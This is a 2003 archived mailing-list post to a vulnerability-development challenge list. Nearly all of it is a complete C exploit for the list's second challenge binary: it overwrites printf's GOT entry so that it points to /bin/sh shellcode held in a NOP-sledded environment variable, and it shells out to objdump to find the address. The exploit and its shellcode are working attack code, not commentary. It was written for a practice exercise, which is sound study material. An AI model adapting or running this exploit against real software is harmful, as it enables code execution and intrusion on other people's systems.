[Vuln-dev Challenge] example exploit for 2

From: otat_private
Date: Sat May 24 2003 - 09:18:47 PDT

Next message: D.: "[Vuln-dev Challenge] Challenge #2"

Previous message: D.: "Re: [Vuln-dev Challenge] Challenge #2"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

example exploit for vuln-dev challenge 2, requires the address
of the shellcode in the environment as an argument

/*
 * example exploit code for vuln-dev challenge 2
 *
 * we overwrite printf's got table entry to point to our
 * shellcode in the environment
 *
 * omicron tau - otat_private
 */

/*
 * objdump, grep, and awk need to be in your path
 *
 * tested on linux 2.4.20 using env address 0xbfffe2ac
 *
 * rm db.log first
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define VULNPATH        "./vdc2"                /* path to vulnerable
binary */

/* /bin/sh */
char shellcode[]=
    "\xeb\x21\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x89\x76\x0b\x8d"
    "\x5e\x08\x89\x5e\x0f\x89\x46\x13\xb0\x0b\x89\xf3\x8d\x4e\x0b"
    "\x8d\x56\x13\xcd\x80\xe8\xda\xff\xff\xff\x2f\x62\x69\x6e\x2f"
    "\x73\x68\x38\x2d\x69\x32\x33\x34\x35\x36\x37\x38\x39\x61\x62"
    "\x63\x64\x65";

unsigned int go;        /* GOT entry address for printf */

void
find_got_addr()
{
        FILE *p;
        char buf[1024];

        snprintf(buf, sizeof(buf), "objdump -R %s | grep ' printf' |
" \
            "awk '{ print \"0x\"$1 }'", VULNPATH);
        p = popen(buf, "r");
        fgets(buf, sizeof(buf), p);
        pclose(p);

        go = strtoul(buf, NULL, 0);
        go -= 2;        /* ;; */

        printf("[!] using got addr 0x%x\n", go);
}

int
main(int argc, char *argv[])
{
	char envbuf[8192];
	char obuf[129];
	char scbuf[5];
	unsigned int scaddr;
	int i;

	if (argc < 2) {
		fputs("vdc2x: usage: vdc2x scaddr\n", stderr);
		exit(1);
	}
	scaddr = strtoul(argv[1], NULL, 0);

	find_got_addr();

	memset(obuf, 0, sizeof(obuf));
	for (i = 0; i < sizeof(obuf) - 1; i+=4)
		memcpy(&obuf[i], &go, 4);
	obuf[sizeof(obuf) - 1] = 0;

	memset(envbuf, 0x90, sizeof(envbuf));
	memcpy(&envbuf[8000], shellcode, strlen(shellcode));
	envbuf[sizeof(envbuf) - 1] = 0;
	setenv("SC", envbuf, 1);

	memcpy(scbuf, &scaddr, 4);
	scbuf[4] = 0;
	execl(VULNPATH, "./vdc2", obuf, scbuf, NULL);

	return(0);
}




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
https://www.hushmail.com/services.php?subloc=messenger&l=434

Big $$$ to be made with the HushMail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427

Next message: D.: "[Vuln-dev Challenge] Challenge #2"
Previous message: D.: "Re: [Vuln-dev Challenge] Challenge #2"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sat May 24 2003 - 14:10:51 PDT